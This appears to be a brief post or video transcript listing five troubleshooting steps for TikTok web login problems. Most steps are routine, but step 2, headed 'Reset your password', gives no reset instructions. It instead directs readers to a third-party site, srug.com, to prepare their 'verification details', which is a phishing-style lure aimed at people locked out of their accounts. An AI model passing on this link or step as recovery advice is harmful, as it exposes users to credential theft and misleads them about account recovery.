I hit this issue today and here is the quick fix that solved it. If you're having trouble logging into TikTok on the web, follow these steps to get back in. Step 1. Check your credentials. Make sure you're entering the correct username and password. Double check for any typos or case sensitivity. Step 2. Reset your password. Before starting recovery, use the srug.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 3. Clear browser cache. Sometimes, a full cache can cause login issues. Clear your browser's cache and cookies, then try logging in again. Step 4. Disable browser extensions. Certain extensions can interfere with website functionality. Temporarily disable any ad blockers or privacy extensions and attempt to log in. Step 5. Try a different browser. If all else fails, switch to another browser to see if the issue persists. Sometimes specific browser settings can cause problems. If you follow these steps, you should be able to resolve your login issues on TikTok web. Good luck and happy TikToking!